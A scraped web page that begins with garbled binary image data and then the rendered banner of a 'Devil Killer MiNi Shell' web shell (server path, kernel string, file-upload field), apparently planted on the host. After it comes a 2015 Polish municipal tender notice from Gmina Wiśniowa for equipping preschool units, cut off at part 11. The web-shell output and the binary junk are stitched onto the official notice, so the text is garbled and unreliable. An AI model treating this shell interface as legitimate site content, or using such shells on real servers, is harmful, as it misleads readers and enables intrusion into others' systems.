JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150304/47820-N-2015.html

<p class="kh_header"><b>Wiśniowa: Rozwijamy usługi edukacyjne w oddziałach przedszkolnych w Gminie Wiśniowa - dostawy</b><br>
<b>Numer ogłoszenia: 47820 - 2015; data zamieszczenia: 04.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiśniowa , Wiśniowa 150, 38-124 Wiśniowa, woj. podkarpackie, tel. 017 2775062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wisniowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwijamy usługi edukacyjne w oddziałach przedszkolnych w Gminie Wiśniowa - dostawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wyposażenie 8 oddziałów przedszkolnych tj. SP Szufnarowa, SF Pstrągówka, SP Różanka, SF Niewodna, SP Markuszowa, SF Kozłówek, SP Jaszczurowa, SF Jazowa.

Zadanie 1  Dostawa odkurzacza wielofunkcyjnego do 7 oddziałów przedszkolnych tj. SP Szufnarowa, SP Różanka, SF Niewodna, SP Markuszowa, SF Kozłówek, SP Jaszczurowa, SF Jazowa,  dostawa froterki do SP w Różance i SP w Markuszowej, dostawa wózka dwuwiaderkowego z zestawem mopów do SP w Różance wg opisu zał. II 1. 

Zadanie 2.   Dostawa zmywarko-wyparzarki  do SP w Różance, dostawa szafy na naczynia  do SP w Różance, dostawa termosu styropianowego  do SP w Różance, .   dostawa 4 termosów z pompką  4 l  do SP w Różance, dostawa szafki na sztućce  do SP w Różance, dostawa 2 chłodziarko-zamrażarek  do SP w Różance i SP Markuszowa, dostawa 3 czajników bezprzewodowych  do SP w Różance i SP Markuszowa i SF w Jazowej, dostawa metalowego stolika pod okienko, stolika pod zmywarkę, opiekacza-grylownicy  do SP Markuszowa,   dostawa kompletu naczyń 25 szt., zestawu sztućców, zakup garnka 2 szt, dla SF w Jazowej  wg opisu zał. II. 2. 
Zadanie 3. Dostawa mebli i wyposażenia do oddziału przedszkolnego  w SP Różance, SF w  Niewodnej, SP w Markuszowej, SF w Kozłówku, SF w Jazowej wg załącznika II. 3   
Zadanie 4. Dostawa rolet okiennych do  SP Szufnarowa, Markuszowa, Jazowa wg załącznika II. 4 
Zadanie 5 . Dostawa zestawów wypoczynkowych do SP Różanka, SP Markuszowa, SF w Niewodnej, SF Kozłówku, SF w Jazowej wg załącznika II. 5  
Zadanie 6  Dostawa i montaż szafek  do szatni  SP Różanka, SP Markuszowa,  wg załącznika II.6 
Zadanie 7  Dostawa zabawek  do SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 7
Zadanie 8  Dostawa pomocy dydaktycznych do  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 8 
Zadanie 9  Dostawa artykułów plastycznych do SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 9.
Zadanie 10  Dostawa wyposażenia zapewniającego bezpieczne warunki opieki nad dziećmi   do SP Różanka, wg załącznika II. 10.
Zadanie 11  Dostawa sprzętu ITC  do SP Szufnarowa,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SP Jaszczurowa i SF Jazowa wg załącznika II. 11.
Zadanie 12  Dostawa sprzętu audiowizualnego do SP Szufnarowa, SF Pstragówka,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SF Jazowa wg załącznika II. 12.
Zadanie 13  Dostawa tablic interaktywnych wraz z montażem i oprogramowaniem  do SP Szufnarowa, SF Pstrągówka, SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SP Jaszczurowa, SF w Jazowej  wg załącznika II. 13. 
Zadanie 14 Dostawa kserokopiarek do SP Szufnarowa,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 14.

Rodzaj oraz ilości produktów wraz z wymaganymi minimalnymi parametrami zawarte są w załącznikach II.1 do II.14  do SIWZ 

Nazwy własne i numery katalogowe z katalogu (Nowa Szkoła) użyte w opisie przedmiotu zamówienia, określają typ produktu lub producenta, zostały podane przykładowo w celu określenia minimalnych oczekiwanych parametrów jakościowych, funkcjonalnych i użytkowych produktu. Za materiały równoważne uważa się takie, które posiadają co najmniej te same parametry techniczne i jakościowe, a zastosowanie ich w żaden sposób nie wpłynie na pogorszenie zastosowanego standardu wyposażenia opisanego w załącznikach od II.1 do II.14. 
Wszystkie pomoce dydaktyczne i sprzęt muszą być fabrycznie nowe, wolne od wad oraz dopuszczone do stosowania w placówkach oświatowych.
Wszystkie dostarczone towary (produkty) muszą posiadać odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem oraz oznakowanie przedmiotów dostaw za pomocą logotypu Kapitał Ludzki i logotypu Unia Europejska oraz umieszczenia informacji o współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 37.52.00.00-9, 39.16.21.00-6, 30.21.30.00-6, 38.65.21.00-1, 32.00.00.00-3, 30.12.12.00-5, 32.32.20.00-6, 39.51.54.10-2, 39.71.00.00-2, 39.72.00.00-5, 39.22.00.00-0, 35.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik 1 do SIWZ,
3) Parafowany wzór umowy.
4) Oświadczenie wykonawcy o udzieleniu gwarancji i rękojmi na wykonany przedmiot zamówienia na okres minimum 12 miesięcy, licząc od dnia przekazania wyposażenia - załącznik 6 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Gwarancja - 0.1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonania zmian postanowień niniejszej umowy w niżej określonych przypadkach:
1) Zmiany terminu wykonania zamówienia, jeżeli konieczność zmiany terminu nie wynika z przyczyn zależnych od wykonawcy takich jak: 
a) zmiany umowy zamawiającego z Instytucją Pośredniczącą w zakresie terminów lub wysokości płatności dofinansowania realizacji projektu stanowiącego przedmiot umowy;
b) działania siły wyższej mającej bezpośredni wpływ na terminowość wykonania robót;
c) konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć;
2) Konieczności zmiany, w zakresie wysokości wynagrodzenia, związanej ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT).

Zmiana postanowień Umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wisniowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno-Administracyjny Szkół w Wiśniowej,
Wiśniowa 76, 38-124 Wiśniowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 11:00, miejsce: Urząd Gminy Wiśniowa, 38-124 Wiśniowa 150, pokój nr 2 - sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Kapitał Ludzki ,Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1. Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej. Tytuł projektu:  (Rozwijamy  usługi edukacyjne w oddziałach przedszkolnych w  Gminie Wiśniowa)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa odkurzacza wielofunkcyjnego do 7 oddziałów przedszkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odkurzacza wielofunkcyjnego do 7 oddziałów przedszkolnych tj. SP Szufnarowa, SP Różanka, SF Niewodna, SP Markuszowa, SF Kozłówek, SP Jaszczurowa, SF Jazowa. Dostawa froterki do SP w Różance i SP w Markuszowej, dostawa wózka dwuwiaderkowego z zestawem mopów do SP w Różance wg opisu zał. II 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.00.00-2, 39.72.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zmywarko-wyparzarki,  szafy na naczynia, termosu styropianowego, 4 termosów z pompką  4l, dostawa szafki na sztućce, 2 chłodziarko-zamrażarek, 3 czajników bezprzewodowych, metalowego stolika pod okienko, stolika pod zmywarkę, opiekacza-grylownicy, kompletu naczyń 25 szt., zestawu sztućców, zakup garnka 2 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zmywarko-wyparzarki  do SP w Różance, dostawa szafy na naczynia  do SP w Różance, dostawa termosu styropianowego  do SP w Różance. Dostawa 4 termosów z pompką  4 l  do SP w Różance, dostawa szafki na sztućce  do SP w Różance, dostawa 2 chłodziarko-zamrażarek  do SP w Różance i SP Markuszowa, dostawa 3 czajników bezprzewodowych  do SP w Różance i SP Markuszowa i SF w Jazowej, dostawa metalowego stolika pod okienko, stolika pod zmywarkę, opiekacza-grylownicy  do SP Markuszowa,  dostawa kompletu naczyń 25 szt., zestawu sztućców, zakup garnka 2 szt, dla SF w Jazowej  wg opisu zał. II. 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mebli i wyposażenia do oddziałów przedszkolnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mebli i wyposażenia do oddziału przedszkolnego  w SP Różance, SF w  Niewodnej, SP w Markuszowej, SF w Kozłówku, SF w Jazowej wg załącznika II. 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.16.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa rolet okiennych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa rolet okiennych do  SP Szufnarowa, Markuszowa, Jazowa wg załącznika II. 4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.54.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa zestawów wypoczynkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawów wypoczynkowych do SP Różanka, SP Markuszowa, SF w Niewodnej, SF Kozłówku, SF w Jazowej wg załącznika II. 5  do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.16.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa i montaż szafek do szatni..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż szafek do szatni SP Różanka, SP Markuszowa,  wg załącznika II.6 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa zabawek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zabawek  do SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pomocy dydaktycznych do  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa artykułów plastycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów plastycznych do SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 9 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa wyposażenia zapewniającego bezpieczne warunki opieki nad dziećmi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wyposażenia zapewniającego bezpieczne warunki opieki nad dziećmi   do SP Różanka, wg załącznika II. 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa sprzętu ITC.</p>
